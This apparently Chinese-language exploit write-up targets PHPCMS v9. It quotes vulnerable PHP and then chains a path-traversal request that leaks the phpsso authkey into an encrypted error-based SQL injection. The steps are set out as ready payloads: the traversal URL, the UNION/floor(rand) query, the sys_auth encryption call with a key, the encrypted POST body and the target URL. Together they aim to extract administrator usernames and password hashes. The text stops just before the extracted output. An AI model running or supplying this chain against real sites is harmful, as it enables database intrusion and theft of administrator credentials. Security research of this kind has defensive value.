- /api/get_menu.php
function ajax_getlist() {
$cachefile = $_GET['cachefile'];
$cachefile = str_replace(array('/', '//'), '', $cachefile);
//$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile);
$path = $_GET['path'];
$path = str_replace(array('/', '//'), '', $path);
//$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path);
$title = $_GET['title'];
$key = $_GET['key'];
$infos = getcache($cachefile,$path);
其中getcache中参数可控,可以包含cache文件夹中配置文件得到authkey。利用authkey可以进行SQL注入。
- /phpsso_server/phpcms/modules/phpsso/index.php
public function getuserinfo($is_return = 0) {
$this->uid = isset($this->data['uid']) ? $this->data['uid'] : '';
$this->email = isset($this->data['email']) ? $this->data['email'] : '';
if($this->uid > 0) {
$r = $this->db->get_one(array('uid'=>$this->uid));
} elseif(!empty($this->username)) {
$r = $this->db->get_one(array('username'=>$this->username));
} elseif(!empty($this->email)) {
$r = $this->db->get_one(array('email'=>$this->email));
} else {
return false;
}
将uid直接带入查询,造成SQL注入漏洞。
访问URL地址,获取authkey:
http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin&key=authkey
利用PHPCMS的内置加密函数sys_auth加密如下内容:
uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
调用方法为:
echo sys_auth("uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'", "ENCODE", "94n16bQt8F0900oowgpQENmCvCd69szh");
得到结果为:
利用Hackbar进行注入,POST内容:
data=ada8YbYCC4vW3ZUiLq9FHK4AU0W2Nrho-QpN_rBOBhf8MRIqj_GOZS5-EUBX8_oL6QlfTkvv84VuO_ZFa_JlrxiYgxai6qjiikU78vn90aH-jnD4Emx4LYPx2pCiuNB3HKUvKiykjtnZSwlBAlBdpGOTvYnoZOgiXFBcfPCf-ApPYyVlQCSoN0BS04yKgUdU8ijkulguiKwDR1jYzaFA_GLGtV-R1AkEKHNz9ImpH_QwIzAwd4SJdhrPgVej69CS_rLMfYNH7F1f174jzPjunyKfJCEgszsmoHys19fIVMyiABzRU6t_tzTjmX9xGFahK7nnFRx8cdC13aT0nMO9txLCL5f0uTS86kn2CXRa9rN_-8JLTl0hv9dNsNvVGSHk4ndz
到:
http://10.211.55.12/phpcms/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1
得到管理员的帐号密码: